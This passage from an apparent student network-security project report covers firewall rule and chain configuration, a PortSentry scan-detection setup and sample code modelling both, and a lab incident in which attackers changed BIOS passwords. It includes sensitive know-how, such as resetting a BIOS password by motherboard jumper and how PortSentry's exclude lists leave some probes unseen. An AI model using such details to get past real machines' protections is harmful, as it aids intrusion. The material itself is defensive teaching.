• Initial outbound: first rules executed by the firewall for outbound packets.
• Inbound/outbound chains for each device: rules executed when a packet is received/transmitted on a certain device.
• Final inbound: last rules executed by the firewall for inbound packets.
• Final outbound: last rules executed by the firewall for outbound packets.

Looking at the firewall rules as a program executed by the data-path module, a chain represents a function call made when some condition is matched. For instance, if the packet is incoming on device 'dev0', call the 'Inbound device chain'. Chains can also return a value when their execution is over.

Rules and Chains Examples

The advanced filter rg_conf API is a powerful tool for configuring firewall rules in the most flexible way. Residing in rg_conf/fw/policy, it enables you to:

• Define several policies for the firewall.
• Group rules in a chain.
• Define initial and final rules.
• Define rules per device.
• Define rules that match a service, IP address, IP range, MAC address, and other options such as fragments.
• Define the action for a rule: call another chain, accept and create a stateful-inspection connection, accept stateless, drop the packet, or reject it.
• Define rules using a wildcard interface or a wildcard IP, for example all LAN devices/all WAN devices.

The advanced filter mechanism can be used as a platform for firewall chain call precedence.

The rg_conf contains two main chains, used only to define the call order for other chains:

• Inbound traffic (chain ID 1300)
• Outbound traffic (chain ID 1400)

Each main chain is used only to define the call precedence of the specific chains in which the actual rules are grouped.

The following is an example of an rg_conf call chain:

(1300                                   // Chain 1300 - Inbound chain
    (description(Inbound rules))        // Chain description
    (type(5))
    (output(0))
    (rule
        (0                              // Rule 0 - Call Initial inbound chain
            (enabled(1))
            (action
                (type(call))
                (chain(900))
            )
        )
        (1                              // Rule 1 - Call device eth1 inbound rules
            (enabled(1))
            (action
                (type(call))
                (chain(1656))
            )
            (match
                (if(eth1))
            )
        )
    )
)

The chain calling order is predefined by the system's designers. Changing it may destabilize the system's security, so it is not advisable to modify the chain structure.

Advanced Filtering Rule - 1

The following is an example of an advanced filter rule (without a service) that blocks all communication from LAN host 192.168.1.15 to any WAN host.

(rule                                   // Rule entry
    (0                                  // Rule ID #0
        (enabled(1))                    // Rule is active
        (match                          // Rule conditions
            (ip_src_start(192.168.1.15))        // Rule source IP address:
            (ip_src_end(192.168.1.15))          // 192.168.1.15
            (ip_dst_start(0.0.0.0))             // Rule destination IP address:
            (ip_dst_end(255.255.255.255))       // any address, 0.0.0.0-255.255.255.255
            (services)                          // No services for this rule
        )
        (action                         // Rule result
            (type(drop))                // Drop packet
            (log(0))                    // Do not log
        )
    )
)

Advanced Filtering Rule - 2

The following is an advanced filter rule example that uses a service. This rule allows all HTTP communication from any IP address to one of Yahoo!'s IPs:

(rule                                   // Rule entry
    (0                                  // Rule ID #0
        (enabled(1))                    // Rule is active
        (match                          // Rule conditions
            (ip_frag(0))                        // Allow fragmented packets
            (ip_src_start(0.0.0.0))             // Rule source IP address:
            (ip_src_end(255.255.255.255))       // any address, 0.0.0.0-255.255.255.255
            (ip_dst_start(66.218.71.198))       // Rule destination IP address:
            (ip_dst_end(66.218.71.198))         // 66.218.71.198 (yahoo.com)
            (services                           // Rule services: the packet must match
                (0                              // one of the following services:
                    (service_id(16777219))      // service 16777219 (HTTP): packet is TCP
                )                               // and destined to port 80
            )
        )
        (action                         // Rule result
            (type(accept))              // Accept packet and open a connection
            (log(1))                    // Log this connection opening
        )
    )
)

Advanced MAC Filtering

The following is an example of an advanced filtering MAC rule. Using an advanced filter lets you define sophisticated MAC filter rules, which match not only MAC addresses but protocols and ports as well. For example, suppose you want to prevent HTTP access from one of your LAN hosts but allow it all other communication, and you would also like to log each attempt it makes to connect to an HTTP server. The following rule should be added to either the initial inbound chain or the specific device chain:

(rule
    (0
        (enabled(1))
        (match
            (mac_src(aa:bb:cc:dd:ee:ff))        // LAN host MAC address
            (services
                (0
                    (service_id(16777219))      // HTTP service ID
                )
            )
        )
        (action                         // Rule result
            (type(drop))                // Drop the packet (no HTTP for this host)
            (log(1))                    // Log the attempt
        )
    )
)

Another MAC filtering rule would be to deny all but a set of predefined MAC addresses from accessing any port or protocol. In this way you prevent all foreign MACs from using your network's Internet connection or running sniffing or password-cracking software through it. Keep in mind, however, that a MAC address is set by the host's own driver and is trivially changed, so an attacker who learns an allowed address (from a sniffed broadcast frame, for example) can simply adopt it; a MAC allow-list stops casual connections, not a determined intruder. And even if a foreign PC is connected while all its services are denied, it is still a security breach. The best security measure is to physically secure the routers and switches of your LAN [whole section from 25].
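The rule and chain format above is easiest to understand by executing it. The following is an added example written for this report page, not code from Jungo or from the project: a small parser for the rg_conf s-expression syntax and an evaluator that walks the inbound chain 1300 with the Call semantics described above (a called chain's verdict is final; a chain that matches nothing falls through to the caller's next rule). The policy it loads is constructed for the example and goes slightly beyond the page: it combines the page's chain 1300, the "block HTTP from one LAN host" rule placed in the initial inbound chain, and the deny-all-but-listed-MACs policy of the last paragraph placed in the eth1 device chain. Assumptions: only the match keys that appear on this page are implemented, a bare (services) means any service, and service ID 16777219 is "TCP to port 80" as the page's comments state; the contents of chains 900 and 1656, the MAC addresses and the packets are all made up.

```python
"""Added example for this page (not Jungo/OpenRG code): parse rg_conf rules and walk the
chain structure shown above for sample packets. Assumed: only the match keys used on this
page are handled; a bare (services) means any service; service 16777219 is TCP port 80."""
import re
from ipaddress import IPv4Address

SERVICES = {16777219: ("tcp", 80)}   # hypothetical service table; only HTTP is documented here
_TOKEN = re.compile(r"\(|\)|[^\s()]+")

def parse_all(text):
    """Nested lists, one per top-level rg_conf entry; '//' comments are dropped first."""
    tokens = _TOKEN.findall(re.sub(r"//[^\n]*", "", text))
    pos = 0

    def read():
        nonlocal pos
        tok, pos = tokens[pos], pos + 1
        if tok != "(":
            return tok
        items = []
        while tokens[pos] != ")":
            items.append(read())
        pos += 1                       # consume ')'
        return items

    out = []
    while pos < len(tokens):
        out.append(read())
    return out

def child(node, key):
    """First sub-list of node headed by key, e.g. child(rule, "match"), else None."""
    return next((c for c in node[1:] if isinstance(c, list) and c and c[0] == key), None)

def scalar(node, key, default=None):
    """Value inside a (key(value)) leaf under node, or default when absent."""
    c = child(node, key)
    if c is None or len(c) < 2:
        return default
    return c[1][0] if isinstance(c[1], list) else c[1]

def matches(match, pkt):
    """Every condition present in the match section must hold; absent keys are wildcards."""
    if match is None:
        return True
    for side in ("src", "dst"):
        lo, hi = scalar(match, f"ip_{side}_start"), scalar(match, f"ip_{side}_end")
        if lo and not IPv4Address(lo) <= IPv4Address(pkt[f"{side}_ip"]) <= IPv4Address(hi):
            return False
    mac = scalar(match, "mac_src")
    if mac and mac.lower() != pkt.get("src_mac", "").lower():
        return False
    iface = scalar(match, "if")
    if iface and iface != pkt.get("if"):
        return False
    services = child(match, "services")
    if services is not None and len(services) > 1:   # bare (services) = no restriction
        allowed = {SERVICES[int(scalar(s, "service_id"))] for s in services[1:]}
        if (pkt.get("proto"), pkt.get("dst_port")) not in allowed:
            return False
    return True

def run_chain(chains, chain_id, pkt, depth=0):
    """Execute a chain's rules in order. A 'call' descends into another chain, whose verdict
    (if any) is final; otherwise the next rule is tried. None means the chain fell through."""
    if depth > 16:
        raise RecursionError("chain call loop")
    rules = child(chains[chain_id], "rule") or ["rule"]
    for rule in rules[1:]:
        if scalar(rule, "enabled", "0") != "1" or not matches(child(rule, "match"), pkt):
            continue
        action = child(rule, "action")
        kind = scalar(action, "type")
        if kind != "call":
            return kind, scalar(action, "log", "0") == "1"
        verdict = run_chain(chains, scalar(action, "chain"), pkt, depth + 1)
        if verdict is not None:
            return verdict
    return None

# Constructed policy (not the report's configuration): the page's main inbound chain 1300,
# its "no HTTP for one LAN host" rule in initial-inbound chain 900, and a MAC allow-list
# ending in a logged drop-everything rule in the eth1 device chain 1656.
POLICY = """
(1300 (description(Inbound rules)) (type(5)) (output(0))
  (rule (0 (enabled(1)) (action (type(call)) (chain(900))))                 // initial inbound
        (1 (enabled(1)) (action (type(call)) (chain(1656))) (match (if(eth1))))))
(900 (rule (0 (enabled(1)) (match (mac_src(aa:bb:cc:dd:ee:ff)) (services (0 (service_id(16777219)))))
              (action (type(drop)) (log(1))))))
(1656 (rule (0 (enabled(1)) (match (mac_src(aa:bb:cc:dd:ee:ff)) (services)) (action (type(accept)) (log(0))))
            (1 (enabled(1)) (match (mac_src(00:11:22:33:44:55)) (services)) (action (type(accept)) (log(0))))
            (2 (enabled(1)) (match (ip_src_start(0.0.0.0)) (ip_src_end(255.255.255.255)))
               (action (type(drop)) (log(1))))))
"""
CHAINS = {chain[0]: chain for chain in parse_all(POLICY)}

def inbound_verdict(pkt):
    """Run an inbound packet through main chain 1300: (action, logged), or ('fallthrough', False)."""
    return run_chain(CHAINS, "1300", pkt) or ("fallthrough", False)

def demo():
    """Constructed LAN packets arriving on eth1, keyed by what each case illustrates."""
    lan = {"if": "eth1", "src_ip": "192.168.1.15", "dst_ip": "66.218.71.198", "proto": "tcp"}
    return {
        "listed host, ssh":   inbound_verdict({**lan, "src_mac": "aa:bb:cc:dd:ee:ff", "dst_port": 22}),
        "listed host, http":  inbound_verdict({**lan, "src_mac": "aa:bb:cc:dd:ee:ff", "dst_port": 80}),
        "other listed, http": inbound_verdict({**lan, "src_mac": "00:11:22:33:44:55", "dst_port": 80}),
        "foreign MAC, smb":   inbound_verdict({**lan, "src_mac": "de:ad:be:ef:00:01", "dst_port": 445}),
    }
```

Calling demo() shows why chain order matters: the listed host reaches chain 900 first and loses HTTP there (dropped and logged), while everything else it sends is accepted by the eth1 allow-list; an unlisted MAC falls through chain 900 untouched and is dropped, with a log entry, by the allow-list's final rule. A packet on an interface with no device chain falls through the whole policy, which is the case a real deployment must close with a final-inbound drop.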

5.2 Second Attack: Physical Attack

On Monday the 22nd of May, one day before the FYP report submission, and after an absence of two days (the weekend) from the labs, we discovered upon switching on the computers that the BIOS password had been changed. A message asked us for the "current password" before we could even enter the setup or load Windows (the message appeared as soon as the computer was switched on).

Although we had researched and knew about such a threat (accessing the BIOS settings, including the password, and modifying them), a misunderstanding during the semester led our team to omit setting a password that could not be cracked. Hence, the hackers succeeded in spotting a dangerous security breach and denied us the use of our computers (and hence of our services).

The only way to fix this problem was to "physically" reset the BIOS password. This is done by opening the case, unplugging a three-pin jumper (jumper 13) on the motherboard and plugging it back in when switching the computer on. For more information on how to prevent physical attacks, refer to section 2.1 (examples of counter-measures: lock the case, set up cameras...).

After we physically reset the passwords ourselves, everything went back to normal (with no loss of data) and we could log in again to the Windows workstations and servers. After checking the log files, and comparing the "vital company files" we had created with the backups, we were assured that no further internal attack had been made.

Note that our team stopped monitoring the network on Monday, May 22, 2006 at 6:00pm, i.e. 18 hours before the report submission deadline, in order to focus on writing the report. Nonetheless, some colleagues of ours, working on their own FYPs in the computer labs, informed us that the hackers' team showed up at around 7:30pm on Monday, May 22, 2006, along with a person external to FEA, to conduct some hacks on the network. Not only did they use outside help, but they violated a 'cease-fire' accord we had put into place to concentrate on writing the report.


Conclusion

Network security is essential to any business, or even home, that has a network connected to the outside world (by means of the Internet, for example). Our FYP was conducted in this spirit. This report aims at being proper documentation, usable in any situation where a network has to be built and secured.

In the first part of the report we briefly presented an overview of networks, to fully understand the way in which they operate. Then we explored the theory of network security. We saw that it can be dissected according to the network layers, and the corresponding security of each was discussed in depth. However, this does not cover all aspects of network security: an attack through a given layer (for instance IP session hijacking at the network layer) can lead to a breach on another layer (for example sending malicious code at the application layer). It is therefore important to keep in mind that network security should be seen as a whole, even though it is divided into layers. We then presented a survey of the most common threats and the ways they should be dealt with, since to properly secure a network it is important to know the enemy. Topics such as attacks automated by malicious code, denial of service (DoS) and social engineering were covered.

After this 'theory' part of the report, we documented the whole process that led to the installation and defense of the network. Our network topology was presented (a hierarchical star topology, to simulate a real business environment), as well as the means by which we secured the perimeter (using a Linksys firewall). Then we described the way in which we installed the network (from installing the operating systems to creating a domain), and went on to document the steps we took to secure it. We started by downloading all relevant patches and service packs, then disabled the USB ports to protect the network against flash drives, and ran some freeware tools such as LANguard and Event Alarm to tighten and monitor security.

Once our secured network was up and running, we started to work on ways to optimize security and monitoring. First, we customized a Honeyd configuration to our network's topology and needs (using Fedora) to confuse the hackers when they conducted external attacks. Then we wrote a Windows program that monitored the user logs: its output was a log file with the username of each user that logged in, as well as the time of logging in and out. In this way, internal attacks were spotted more easily and dealt with faster, and hence more efficiently.

Finally, the report also gives full documentation of the attacks that were performed by the hackers' team. Although this was meant to be an exciting part of our FYP, the hackers' team was late in starting those attacks, and hence not many security breaches were reported.

The FYP was a chance for us to be exposed to Windows and UNIX network security, and gave us much-needed exposure to these operating systems. Not only did we learn the theory behind network security, we also applied it and 'lived' it throughout the second half of the year. We also contributed to the field by introducing Honeyd as an important and useful tool (honeypots are not commonly used in businesses), as well as by creating a program that enables a network administrator to monitor and archive the logs. Many other contributions can be made in future work, as the network security field is a very wide one.


References

1. Majari, S.A. "Security Engineering: Survey Analysis and Practical Guidelines for a Multi-dimensional Layered Security", 2004.
2. Cisco Systems, "Interconnecting Cisco Network Devices – Student Guide".
3. Ford, D. "8 Simple Rules For Securing Your Internal Network", 2003.
4. Lai, Hock, Tai, "Windows 2000 Vulnerabilities and Solutions", 2003.
5. http://www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-BufferOverflow.vcf
6. http://www.securityfocus.com/data/vulnerabilities/exploits/wins2.pl
7. http://www.atruereview.com/articles/winsecurity.php
8. http://en.wikipedia.org/wiki/Network_topology
9. "Cisco Integrated Firewall Solutions" (data sheet): http://www.cisco.com/application/pdf/en/us/guest/netsol/ns118/c654/cdccont_0900aecd800eed2e.pdf
10. "Perimeter Security: A Security Blueprint for Enterprise Networks", Cisco white paper, no date available.
11. "The Evolution of Network Security: From DMZ Designs to Devices", META Group white paper, May 2004.
12. Curtin, M. "Introduction to Network Security", March 1997.
13. Blaze, M., Ioannidis, J., Keromytis, A.D. "Trust Management and Network Layer Security", AT&T Laboratories – Research.
14. http://library.thinkquest.org/04oct/00460/netwAttack.html
15. http://www.comptechdoc.org/independent/security/recommendations/secattacks.html
16. http://www.insecure.org/sploits/l0phtcrack.lanman.problems.html
17. http://www.securitydocs.com/library/2695
18. http://labmice.techtarget.com/articles/usbflashdrives.htm
19. http://www.jsifaq.com, tip number 7093
20. "A Virtual Honeypot Framework": http://niels.xtdnet.nl/papers/honeyd.pdf
21. Specter: http://www.specter.com
22. Honeyd: http://www.citi.umich.edu/u/provos/honeyd/
23. Decoy Server: http://www.recourse.com
24. Honeynets: http://project.honeynet.org/papers/honeynet/
25. Jungo: http://www.jungo.com


Appendix

Appendix A: Changing the Terminal Server (RDP) listening port

Source: http://support.microsoft.com/default.aspx?scid=187623

1. Run Regedt32 and go to this key:

   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

   NOTE: The above registry key is one path; it has been wrapped for readability.

2. Find the "PortNumber" value and notice its data of 00000D3D, hex for 3389. Modify the port number in hex and save the new value.

To change the port for a specific connection on the Terminal Server:

1. Run Regedt32 and go to this key:

   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\connection

   NOTE: The above registry key is one path; it has been wrapped for readability.

2. Find the "PortNumber" value and notice its data of 00000D3D, hex for 3389. Modify the port number in hex and save the new value.

NOTE: Because the use of alternate ports has not been fully implemented for Terminal Server 4.0, support will be provided as "reasonable effort" only, and Microsoft may require you to set the port back to 3389 if any problems occur.

The new port is used once Terminal Services has been restarted, and clients must then connect to host:port explicitly. Moving the listener off 3389 only hides it from the laziest probes; a port scan still finds it, so it is no substitute for firewalling the port and using strong credentials.

Appendix B: PortSentry

1. Download and unzip the source code:

   o Download the PortSentry source code from http://sourceforge.net/projects/sentrytools (note: PortSentry version 1.1 includes a bug fix required for the Red Hat 7.1 kernel 2.4).
   o Move to your source directory and unzip: tar -xzf portsentry-1.1.tar.gz

2. Edit the include file and compile: cd portsentry-1.1/ and read the file README.install. It details the following:

   o Edit file portsentry_config.h and set the options:

     CONFIG_FILE - PortSentry run-time configuration file.
     WRAPPER_HOSTS_DENY - The path and name of the TCP wrapper hosts.deny file.

     #define CONFIG_FILE "/opt/portsentry/portsentry.conf"
     #define WRAPPER_HOSTS_DENY "/etc/hosts.deny"
     #define SYSLOG_FACILITY LOG_DAEMON
     #define SYSLOG_LEVEL LOG_NOTICE

     (Note: we use /opt/portsentry/ because custom files/software can be kept there, which allows for an easy backup by separating them from the OS. If you prefer, you can use /etc/portsentry/ for the configuration files and follow the Linux/Unix file system logic.)

     The default above, LOG_DAEMON, logs messages to the /var/log/messages file.

     To log to a separate file dedicated to PortSentry (this eliminates logging clutter in the main system log file), add logging directives to the syslogd configuration file /etc/syslog.conf.

     Change the following line so that portsentry messages are no longer logged to the regular syslog output file /var/log/messages:

     *.info;mail.none;news.none;authpriv.none;local6.none    /var/log/messages

     Add the following line to assign a portsentry log facility:

     local6.*    /var/log/portsentry.log

     Note: use tabs, not spaces, in the syslog configuration file.

     Restart syslogd: /etc/rc.d/init.d/syslog restart

     Set the portsentry_config.h entry to the new log facility: #define SYSLOG_FACILITY LOG_LOCAL6

     The options for SYSLOG_FACILITY are defined in /usr/include/sys/syslog.h. They include:

     SYSLOG_FACILITY   Facility   Description
     LOG_LOCAL0        local0     reserved for local use
     LOG_LOCAL1        local1     reserved for local use
     LOG_LOCAL2        local2     reserved for local use
     LOG_LOCAL3        local3     reserved for local use
     LOG_LOCAL4        local4     reserved for local use
     LOG_LOCAL5        local5     reserved for local use
     LOG_LOCAL6        local6     reserved for local use
     LOG_LOCAL7        local7     reserved for local use
     LOG_USER          user       random user-level messages
     LOG_MAIL          mail       mail system
     LOG_DAEMON        daemon     system daemons
     LOG_SYSLOG        syslog     messages generated internally by syslogd
     LOG_LPR           lpr        line printer subsystem
     LOG_NEWS          news       network news subsystem
     LOG_UUCP          uucp       UUCP subsystem
     LOG_CRON          cron       clock daemon
     LOG_AUTHPRIV      authpriv   security/authorization messages (private)
     LOG_FTP           ftp        ftp daemon

     The options for SYSLOG_LEVEL include:

     SYSLOG_LEVEL   Priority   Description
     LOG_EMERG      0          system is unusable
     LOG_ALERT      1          action must be taken immediately
     LOG_CRIT       2          critical conditions
     LOG_ERR        3          error conditions
     LOG_WARNING    4          warning conditions
     LOG_NOTICE     5          normal but significant condition
     LOG_INFO       6          informational
     LOG_DEBUG      7          debug-level messages

   o Edit file portsentry.conf to set the paths of the configuration files and the ports to monitor:

     IGNORE_FILE="/opt/portsentry/portsentry.ignore"
     HISTORY_FILE="/opt/portsentry/portsentry.history"
     BLOCKED_FILE="/opt/portsentry/portsentry.blocked"
     KILL_ROUTE="/sbin/route add -host $TARGET$ reject"    - generic Unix KILL_ROUTE; the iptables/ipchains options below are better

     Uncomment and modify the appropriate statements if necessary. The TCP_PORTS= and UDP_PORTS= lists are ignored in the stealth scan detection modes. We added UDP port 68 (BOOTP) and TCP ports 21 (ftp), 22 (ssh), 25 (smtp mail), 53 (dns bind), 80 (http web server) and 119 (news) to the ADVANCED_EXCLUDE_UDP and ADVANCED_EXCLUDE_TCP statements respectively:

     ADVANCED_EXCLUDE_TCP="21,22,25,53,80,110,113,119"          - server
     ADVANCED_EXCLUDE_UDP="21,22,53,110,520,138,137,68,67"

     OR

     ADVANCED_EXCLUDE_TCP="113,139"                               - workstation
     ADVANCED_EXCLUDE_UDP="520,138,137,68,67"

     (See also the list of ports used by remote access trojans.)

     TCP wrapper (hosts.deny) option:

     KILL_HOSTS_DENY="ALL: $TARGET$"

     For more on TCP wrappers see the YoLinux Network Admin Tutorial.

     Route deny options (either the network "route" command or the firewall command iptables/ipchains):

     Simple method to drop network return routes if ipchains is not compiled into your kernel:
     KILL_ROUTE="/sbin/route add -host $TARGET$ reject"
     You can check the addresses dropped with the command netstat -rn; they are routed to interface "-".

     For Linux 2.2.x kernels (version 2.102+) using ipchains (best option):
     KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
     OR
     KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY"
     Note: the second option is without the "-l" (logging) option, so ipchains will not keep logging the port scan in /var/log/messages.

     For those using iptables (RH 7.1+, Linux kernel 2.4+):
     KILL_ROUTE="/sbin/iptables -I INPUT -s $TARGET$ -j DROP"
     (Note: the default in portsentry.conf uses the wrong path for Red Hat. Change /usr/local/bin/iptables to /sbin/iptables.)

     Note on Red Hat 7.1: during installation/upgrade the firewall configuration tool /usr/bin/gnome-lokkit may be invoked. It configures a firewall using ipchains and adds it to your boot process. To see whether ipchains and the Lokkit configuration are invoked during system boot, use the command: chkconfig --list | grep ipchains. You can NOT use portsentry to issue iptables rules if ipchains rules have been issued previously. More information on iptables and ipchains support/configuration is available for Red Hat 7.1 and kernel 2.4.

   o Edit file portsentry.ignore (it contains the IP addresses to ignore):

     127.0.0.1
     0.0.0.0
     (your own IP address)

     The @Home network routinely scans for news servers on port 119 from a server named authorized-scan1.security.home.net. Adding the IP address of this server (24.0.0.203) to the ignore file greatly reduces the logging. We also added their BOOTP server (24.9.139.130).

     We manually issued the iptables (RH 7.1, kernel 2.4) commands on our workstation to drop these hosts and deny their scans. @Home users may add the commands to the file /etc/rc.d/rc.local:

     /sbin/iptables -I INPUT -s 24.0.0.203 -j DROP
     /sbin/iptables -I INPUT -s 24.9.139.130 -j DROP

   o Edit file Makefile:

     INSTALLDIR = /opt

     and comment out the line under "uninstall" (dangerous line!):

     # /bin/rmdir $(INSTALLDIR)

     and comment out the line under "install" (troublesome line!):

     # chmod 700 $(INSTALLDIR)

3. Compile: make linux

4. Install (as root): make install

5. Run PortSentry for advanced UDP/TCP stealth scan detection:

   portsentry -atcp
   portsentry -audp

   OR use the init scripts described in the notes below.

6. Check the log file for attacks. See /var/log/messages, or /var/log/portsentry.log if you are logging to a dedicated file. Also check /etc/hosts.deny for the list of IP addresses that PortSentry has deemed attackers, and the HISTORY_FILE /opt/portsentry/portsentry.history.

   Note: it is possible to have all logging sent to a logging daemon on a single server. This allows the administrator to check the logs on only one server rather than individually on many.

   Note on Red Hat 7.1: Red Hat Powertools 7.1 now includes portsentry 1.0. We recommend using version 1.1 configured as above. Powertools RPM layout:

   • /usr/sbin/portsentry - (chmod 700) executable
   • /etc/portsentry/ - (chmod 700) directory used for configuration files
   • /etc/portsentry/portsentry.conf (chmod 600)
   • /etc/portsentry/portsentry.ignore (chmod 600)
   • /var/portsentry/portsentry.history
   • /var/portsentry/portsentry.blocked

   Instead of a firewall command (ipchains/iptables), a false route is used: /sbin/route add -host $TARGET$ gw 127.0.0.1. Our init script calls the portsentry executable twice with the appropriate command-line arguments to monitor TCP and UDP ports. The Red Hat 7.1 init script uses the file /etc/portsentry/portsentry.modes and a for loop to call portsentry the appropriate number of times. Their init script also recreates the portsentry.ignore file each time portsentry is started, including the IP addresses found with ifconfig and the addresses 0.0.0.0 and localhost. Persistent addresses must be placed above the line stating "Do NOT edit below this", otherwise they are not included when the file is recreated.
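As an added example of how the directives above fit together (illustrative code written for this page, not PortSentry's own implementation), the following Python models PortSentry's per-attempt decision in advanced mode: is the port watched at all (below ADVANCED_PORTS_* and not in ADVANCED_EXCLUDE_*), is the source listed in portsentry.ignore, has it already been blocked, has SCAN_TRIGGER been exceeded, and what KILL_ROUTE and KILL_HOSTS_DENY commands result once $TARGET$ and $PORT$ are substituted. The meaning of those directives is taken from the text above and from the comments in the stock portsentry.conf; the ignore file, the source addresses and the connection attempts are constructed for the example.

```python
"""Added example for this page (it is not PortSentry's code): a model of the decisions
PortSentry makes in advanced (stealth) mode for each connection attempt, driven by the
directives discussed above. Assumed semantics: ports below ADVANCED_PORTS_* are watched
unless listed in ADVANCED_EXCLUDE_*; portsentry.ignore holds addresses or CIDR networks;
$TARGET$ and $PORT$ are substituted into KILL_ROUTE / KILL_HOSTS_DENY; SCAN_TRIGGER is the
number of hits tolerated before blocking. The connection attempts below are constructed."""
from ipaddress import ip_address, ip_network

# Server variant of the directives shown above, with the Red Hat iptables path the
# appendix recommends (the shipped default points at /usr/local/bin/iptables).
CONF = {
    "ADVANCED_PORTS_TCP": 1024,
    "ADVANCED_PORTS_UDP": 1024,
    "ADVANCED_EXCLUDE_TCP": "21,22,25,53,80,110,113,119",
    "ADVANCED_EXCLUDE_UDP": "21,22,53,110,520,138,137,68,67",
    "KILL_ROUTE": "/sbin/iptables -I INPUT -s $TARGET$ -j DROP",
    "KILL_HOSTS_DENY": "ALL: $TARGET$",
    "SCAN_TRIGGER": 0,              # 0 = react on the first hit
}

# Constructed portsentry.ignore: loopback, the unspecified address, the ISP's authorized
# scanner from the appendix, and the whole LAN in CIDR form.
IGNORE_FILE = """\
127.0.0.1
0.0.0.0
24.0.0.203
192.168.1.0/24
"""

def parse_ignore(text):
    """One address or network per line; '#' starts a comment."""
    nets = []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip()
        if entry:
            nets.append(ip_network(entry, strict=False))
    return nets

def excluded_ports(conf, proto):
    return {int(p) for p in conf[f"ADVANCED_EXCLUDE_{proto}"].split(",")}

def is_monitored(conf, proto, port):
    """Advanced mode watches every port below ADVANCED_PORTS_* that is not excluded."""
    return port < conf[f"ADVANCED_PORTS_{proto}"] and port not in excluded_ports(conf, proto)

def render(template, target, port):
    """Fill the $TARGET$ / $PORT$ placeholders of a KILL_* directive."""
    return template.replace("$TARGET$", target).replace("$PORT$", str(port))

class Sentry:
    def __init__(self, conf, ignore_text):
        self.conf = conf
        self.ignore = parse_ignore(ignore_text)
        self.hits = {}              # source address -> number of monitored-port hits
        self.blocked = set()
        self.history = []           # what would be written to portsentry.history / syslog

    def handle(self, src, proto, port):
        """Classify one connection attempt; returns the action PortSentry would take."""
        if not is_monitored(self.conf, proto, port):
            return "unmonitored"    # excluded or above the watched range: never seen
        if any(ip_address(src) in net for net in self.ignore):
            return "ignored"
        if src in self.blocked:
            return "already-blocked"
        self.hits[src] = self.hits.get(src, 0) + 1
        if self.hits[src] <= self.conf["SCAN_TRIGGER"]:
            return "counted"        # below the trigger threshold: only recorded
        self.blocked.add(src)
        self.history.append({
            "attacker": src, "proto": proto, "port": port,
            "route": render(self.conf["KILL_ROUTE"], src, port),
            "hosts_deny": render(self.conf["KILL_HOSTS_DENY"], src, port),
        })
        return "blocked"

def demo():
    """Run constructed attempts (source, protocol, port) through the model."""
    sentry = Sentry(CONF, IGNORE_FILE)
    attempts = [
        ("192.168.1.40", "TCP", 139),   # LAN host: inside the ignored 192.168.1.0/24
        ("24.0.0.203", "TCP", 563),     # ISP scanner: explicitly ignored
        ("203.0.113.9", "TCP", 80),     # web request: port 80 is excluded, never seen
        ("203.0.113.9", "TCP", 23),     # telnet probe on a watched port: blocked
        ("203.0.113.9", "TCP", 143),    # same host again: already blocked
        ("198.51.100.7", "UDP", 161),   # SNMP probe: blocked
    ]
    return [sentry.handle(*attempt) for attempt in attempts], sentry.history
```

The third attempt is the one worth noticing: because port 80 is in ADVANCED_EXCLUDE_TCP in the server variant, PortSentry never sees a web request, so an attacker who only touches excluded ports is invisible to it. An exclude list should therefore contain only the ports of services the host really runs, and the resulting hosts.deny and iptables entries should be reviewed regularly, since a single spoofed packet from a forged source address is enough to get a legitimate address blocked.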


Appendix C: Timeline and Budget

After conducting an extensive literature survey in the fall semester, and learning about network security theory, we began installing the network as the spring semester was starting and worked on the 'practical' part of the FYP according to the following timeline:

• Feb 15th to March 1st: installing the additional RAM in the computers, installing the operating systems and ordering the firewall/switch.
• March 1st to March 31st: setting up the network (domain, user accounts...) and increasing network security (patches, service packs, server settings...).
• March 15th to March 31st: researching honeypots.
• March 15th to March 31st: researching ways to monitor the logs (log files).
• April 1st and onwards: the external attacks were supposed to start, but the hacker team did not show up until the end of April/beginning of May.
• April 1st to April 30th: writing the code for the log monitor, testing it and installing it on our network (this program was not as necessary during external attacks as it was during internal attacks). Note that since we had a few problems installing the code on Windows 2000 (it was written on XP; refer to section 4.6), the program was operational a little behind schedule (around May 5th). Nonetheless, this did not affect our security, since the hackers' team had not even started the internal attacks by that time.
• April 1st onwards: choosing the appropriate honeypot (Honeyd), installing it and configuring it according to our network's needs.
• The attacks effectively took place during the last 2 or 3 weeks before the FYP report submission date (i.e. May 22). Note that our team stopped monitoring the network on Monday, May 22, 2006 at 6:00pm, i.e. 18 hours before the report submission deadline, in order to focus on writing the report.

Budget:

• Firewall/switch: $89.00 (paid by AUB)
• Additional RAM: $120.00 (paid by AUB)
• Printing reports (spring + fall): $100.00
• TOTAL COST: $309.00
